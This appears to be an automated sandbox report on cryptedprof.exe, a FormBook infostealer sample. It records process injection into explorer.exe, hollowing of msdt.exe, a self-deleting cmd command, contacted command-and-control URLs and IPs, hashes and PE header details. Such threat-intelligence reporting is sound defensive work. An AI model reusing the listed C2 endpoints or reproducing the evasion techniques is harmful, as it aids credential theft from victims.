          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\cryptedprof.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\cryptedprof.exe Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: 180000
          Source: C:\Users\user\Desktop\cryptedprof.exe Process created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe'
          Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\cryptedprof.exe'
          Source: explorer.exe, 00000005.00000000.351832152.00000000083EB000.00000004.00000001.sdmp, msdt.exe, 00000007.00000002.591709948.0000000002F20000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.338761645.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000007.00000002.591709948.0000000002F20000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.338761645.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000007.00000002.591709948.0000000002F20000.00000002.00000001.sdmp Binary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.338761645.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000007.00000002.591709948.0000000002F20000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\cryptedprof.exe Code function: 1_2_00403486 EntryPoint, SetErrorMode, GetVersion, lstrlenA, #17, OleInitialize, SHGetFileInfoA, GetCommandLineA, CharNextA, GetTempPathA, GetTempPathA, GetWindowsDirectoryA, lstrcatA, GetTempPathA, lstrcatA, SetEnvironmentVariableA, SetEnvironmentVariableA, SetEnvironmentVariableA, DeleteFileA, OleUninitialize, ExitProcess, lstrcatA, lstrcatA, lstrcatA, lstrcmpiA, SetCurrentDirectoryA, DeleteFileA, CopyFileA, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, File source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match, File source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API 1 | Path Interception | Access Token Manipulation 1 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 131 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Process Injection 512 | Virtualization/Sandbox Evasion 3 | LSASS Memory | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Access Token Manipulation 1 | Security Account Manager | Process Discovery 3 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 512 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap |  | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Information Discovery 13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 12 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact

          Behavior Graph

          [Figure: behavior graph. Behavior Graph ID: 356722, Sample: cryptedprof.exe, Startdate: 23/02/2021, Architecture: WINDOWS, Score: 100]
          Process chain: cryptedprof.exe (started) -> cryptedprof.exe (started) -> explorer.exe (injected) -> msdt.exe (started) -> cmd.exe (started) -> conhost.exe (started)
          Files dropped by cryptedprof.exe: C:\Users\user\AppData\Local\...\System.dll, PE32; C:\Users\user\AppData\Local\Temp\8chdn.dll, PE32
          DNS/IP info for explorer.exe: tabandolano.online 111.221.46.49, 49753, 80 READYSERVER-SGREADYSERVERPTELTDSG Singapore; thatlocaljawn.com 34.102.136.180, 49746, 80 GOOGLEUS United States; 3 other IPs or domains


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          cryptedprof.exe | 27% | ReversingLabs | Win32.Trojan.Generic
          cryptedprof.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dll | 0% | Metadefender |
          C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dll | 0% | ReversingLabs |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.0.cryptedprof.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          1.2.cryptedprof.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          3.0.cryptedprof.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          7.2.msdt.exe.4b9f834.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          3.1.cryptedprof.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.2.msdt.exe.4e4cf8.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          3.2.cryptedprof.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.2.cryptedprof.exe.2a60000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.tabandolano.online/rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.warungsuntik.com/rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk | 0% | Avira URL Cloud | safe
          www.warungsuntik.com/rcv/ | 0% | Avira URL Cloud | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNv | 0% | Avira URL Cloud | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          tabandolano.online | 111.221.46.49 | true | true |  | unknown
          thatlocaljawn.com | 34.102.136.180 | true | true |  | unknown
          www.warungsuntik.com | 168.206.81.138 | true | true |  | unknown
          www.thatlocaljawn.com | unknown | unknown | true |  | unknown
          www.tabandolano.online | unknown | unknown | true |  | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.tabandolano.online/rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk | true | Avira URL Cloud: safe | unknown
          http://www.warungsuntik.com/rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk | true | Avira URL Cloud: safe | unknown
          www.warungsuntik.com/rcv/ | true | Avira URL Cloud: safe | low

                    URLs from Memory and Binaries


                                              Contacted IPs


                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
111.221.46.49 | unknown | Singapore | 63930 | READYSERVER-SGREADYSERVERPTELTDSG | true
168.206.81.138 | unknown | South Africa | 137951 | CLAYERLIMITED-AS-APClayerLimitedHK | true

                                              General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356722
Start date: 23.02.2021
Start time: 15:29:59
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 23s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: cryptedprof.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/4@3/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 27.7% (good quality ratio 25.6%)
• Quality average: 77%
• Quality standard deviation: 29.9%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 100
• Number of non-executed functions: 56
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.211.6.115, 52.255.188.83, 168.61.161.212, 13.64.90.137, 51.104.139.180, 93.184.221.240, 51.103.5.186, 52.155.217.156, 92.122.213.194, 92.122.213.247, 20.54.26.129, 184.30.20.56
                                              • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                              Simulations

                                              Behavior and APIs

                                              No simulations

                                              Joe Sandbox View / Context

                                              IPs


                                              Domains

                                              No context

                                              ASN


                                              JA3 Fingerprints

                                              No context

                                              Dropped Files


                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Temp\8chdn.dll
Process: C:\Users\user\Desktop\cryptedprof.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11776
Entropy (8bit): 6.515618036223174
Encrypted: false
SSDEEP: 192:BhCyADdd/dsb+YD5JOB+A8nxKJ8c0UWMH0Bi:/4n/+6G9xRU
MD5: F606DDBC12720E77335BB234DE7D3051
SHA1: 806D928CD8C37F1121984CD10DB737260B07B599
SHA-256: 55A8B4D54B2C5D7D5A8B5C2F55C57D5C365D0176F1E44833D17DADA120F4A68C
SHA-512: 0D5921310A2E1C3223422E77CA07263A58E7513A1E60022B26DB1879648A0126B31C96CD02681F8A415CA105FB393BDA330F3807F6388380D2BC6B4D6122CB7B
Malicious: false
Reputation: low
                                                                                      C:\Users\user\AppData\Local\Temp\fhhit.ac
Process: C:\Users\user\Desktop\cryptedprof.exe
File Type: data
Category: dropped
Size (bytes): 185856
Entropy (8bit): 7.999195886882973
Encrypted: true
SSDEEP: 3072:PsU41q9M2FboK24/pOrBMy3LgSLnUZnSAUe+aL8yRvJzF3vY/vH7:0cBpOVMy3cpZnT+aYuJp3vYnH7
MD5: 459E9C75DFA41F95277D89AF36332AD0
SHA1: 959AD4FD57AF69845D537CFD5C0F8E1935F7FD30
SHA-256: 8704B72C6EF206B17353D109FC6D0E7194E50C066C8C6DF8B42F547502C0D9D8
SHA-512: FEBCF2F3869E300F31DF2292D99F957D2ADCE6D62F068477C1CBF61B1390D1ADD42C91669557E13CCA3A596BDE10D619479E17B0115C7AC2A9AD99455F13654B
Malicious: false
Reputation: low
                                                                                      C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dll
                                                                                      Process:C:\Users\user\Desktop\cryptedprof.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):11776
                                                                                      Entropy (8bit):5.855045165595541
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                      MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                      SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                      SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                      SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: Metadefender, Detection: 0%
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe, Detection: malicious
                                                                                      • Filename: QTN3C2AF414EDF9_041873.xlsx, Detection: malicious
                                                                                      • Filename: TIC ENQ2040 FCl.xlsx, Detection: malicious
                                                                                      • Filename: lpdKSOB78u.exe, Detection: malicious
                                                                                      • Filename: jTmBvrBw7V.exe, Detection: malicious
                                                                                      • Filename: 523JHfbGM1.exe, Detection: malicious
                                                                                      • Filename: TAk8jeG5ob.exe, Detection: malicious
                                                                                      • Filename: PAYMENT COPY.exe, Detection: malicious
                                                                                      • Filename: ORDER LIST.xlsx, Detection: malicious
                                                                                      • Filename: Orderoffer.exe, Detection: malicious
                                                                                      • Filename: Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exe, Detection: malicious
                                                                                      • Filename: INV_PR2201.docm, Detection: malicious
                                                                                      • Filename: CV-JOB REQUEST______PDF.EXE, Detection: malicious
                                                                                      • Filename: Request for Quotation.exe, Detection: malicious
                                                                                      • Filename: #U007einvoice#U007eSC00978656.xlsx, Detection: malicious
                                                                                      • Filename: Purchase Order___pdf ____________.exe, Detection: malicious
                                                                                      • Filename: quote.exe, Detection: malicious
                                                                                      • Filename: Order83930.exe, Detection: malicious
                                                                                      • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious
                                                                                      • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious
                                                                                      Reputation:moderate, very likely benign file
                                                                                      C:\Users\user\AppData\Local\Temp\nsq1F7.tmp
                                                                                      Process:C:\Users\user\Desktop\cryptedprof.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):212876
                                                                                      Entropy (8bit):7.898845441356521
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:gLGYsU41q9M2FboK24/pOrBMy3LgSLnUZnSAUe+aL8yRvJzF3vY/vHSNt:gLGJcBpOVMy3cpZnT+aYuJp3vYnH6t
                                                                                      MD5:392D17F078932F65177A128DC21CCE8C
                                                                                      SHA1:B7FBFEC205559E2698EA814FCC79CBDAC94E61FE
                                                                                      SHA-256:3BCA4926EA2A2FCD3A72893AF270033E9DCB8112B6BF24022FE47A7704E5A8B2
                                                                                      SHA-512:6FC6AB4E4D24D28F96C92B517393404279FFAA9B3B76B93F0BD3A37D27875E6A08F9CAE1AC28313088C041DA7066674FBB6C42D16F000D8B1EB844D7E13BB3BC
                                                                                      Malicious:false
                                                                                      Reputation:low

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                      Entropy (8bit):7.1919627087512215
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:cryptedprof.exe
                                                                                      File size:339210
                                                                                      MD5:72efe20e4a59ae2722383b8786956994
                                                                                      SHA1:453b2af3b318668926087556eebfa93eda75d2df
                                                                                      SHA256:d8e0edf1cca3b6edefcd830e233131c593997b5bd4454891dc1b70614862f718
                                                                                      SHA512:3b4c4106d6576ff14419bc9144473e9cc6ef1177dbcd7d9319559fe05563cdf50e9dc62d179464b07d020e98f92da52435e388d3e0e754ca65b14ac0d4e5320e
                                                                                      SSDEEP:6144:111QBRRiKNkBMH1JtudsBnOVMy3cdZnT8aYuJp3v4qzVpwyeLyA:iRtkBMH1ruds5+r3cdZnYalF44VTG
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...........4............@

                                                                                      File Icon

                                                                                      Icon Hash:70cc8696868ce031

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x403486
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                      Time Stamp:0x5F24D75F [Sat Aug 1 02:45:51 2020 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      sub esp, 00000184h
                                                                                      push ebx
                                                                                      push esi
                                                                                      push edi
                                                                                      xor ebx, ebx
                                                                                      push 00008001h
                                                                                      mov dword ptr [esp+18h], ebx
                                                                                      mov dword ptr [esp+10h], 0040A130h
                                                                                      mov dword ptr [esp+20h], ebx
                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                      call dword ptr [004080B0h]
                                                                                      call dword ptr [004080C0h]
                                                                                      and eax, BFFFFFFFh
                                                                                      cmp ax, 00000006h
                                                                                      mov dword ptr [0042F44Ch], eax
                                                                                      je 00007F1D44B738D3h
                                                                                      push ebx
                                                                                      call 00007F1D44B76A4Eh
                                                                                      cmp eax, ebx
                                                                                      je 00007F1D44B738C9h
                                                                                      push 00000C00h
                                                                                      call eax
                                                                                      mov esi, 004082A0h
                                                                                      push esi
                                                                                      call 00007F1D44B769CAh
                                                                                      push esi
                                                                                      call dword ptr [004080B8h]
                                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                                      cmp byte ptr [esi], bl
                                                                                      jne 00007F1D44B738ADh
                                                                                      push 0000000Bh
                                                                                      call 00007F1D44B76A22h
                                                                                      push 00000009h
                                                                                      call 00007F1D44B76A1Bh
                                                                                      push 00000007h
                                                                                      mov dword ptr [0042F444h], eax
                                                                                      call 00007F1D44B76A0Fh
                                                                                      cmp eax, ebx
                                                                                      je 00007F1D44B738D1h
                                                                                      push 0000001Eh
                                                                                      call eax
                                                                                      test eax, eax
                                                                                      je 00007F1D44B738C9h
                                                                                      or byte ptr [0042F44Fh], 00000040h
                                                                                      push ebp
                                                                                      call dword ptr [00408038h]
                                                                                      push ebx
                                                                                      call dword ptr [00408288h]
                                                                                      mov dword ptr [0042F518h], eax
                                                                                      push ebx
                                                                                      lea eax, dword ptr [esp+38h]
                                                                                      push 00000160h
                                                                                      push eax
                                                                                      push ebx
                                                                                      push 00429878h
                                                                                      call dword ptr [0040816Ch]
                                                                                      push 0040A1ECh

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                      Data Directories

                                                                                      Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT          0x8544           0xa0          .rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE        0x38000          0x19038       .rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x29c         .rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                      Sections

                                                                                      Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                                                                                      .text   0x1000           0x65ad        0x6600    False     0.675628063725   data       6.48593060343  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                      .rdata  0x8000           0x1380        0x1400    False     0.4634765625     data       5.26110074066  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data   0xa000           0x25558       0x600     False     0.470052083333   data       4.21916068772  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                      .ndata  0x30000          0x8000        0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .rsrc   0x38000          0x19038       0x19200   False     0.341466495647   data       4.34524426272  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      Name           RVA      Size     Type                                                                          Language  Country
                                                                                      RT_ICON        0x38298  0x10828  dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                                      RT_ICON        0x48ac0  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 1073807359, next used block 4294903552
                                                                                      RT_ICON        0x4cce8  0x25a8   data
                                                                                      RT_ICON        0x4f290  0x10a8   data
                                                                                      RT_ICON        0x50338  0x468    GLS_BINARY_LSB_FIRST
                                                                                      RT_DIALOG      0x507a0  0x100    data                                                                          English   United States
                                                                                      RT_DIALOG      0x508a0  0x11c    data                                                                          English   United States
                                                                                      RT_DIALOG      0x509bc  0x60     data                                                                          English   United States
                                                                                      RT_GROUP_ICON  0x50a1c  0x4c     data
                                                                                      RT_VERSION     0x50a68  0x290    MS Windows COFF PA-RISC object file                                           English   United States
                                                                                      RT_MANIFEST    0x50cf8  0x340    XML 1.0 document, ASCII text, with very long lines, with no line terminators  English   United States

                                                                                      Imports

                                                                                      DLL           Import
                                                                                      ADVAPI32.dll  RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                                      SHELL32.dll   SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                                      ole32.dll     IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                                      COMCTL32.dll  ImageList_Create, ImageList_Destroy, ImageList_AddMasked
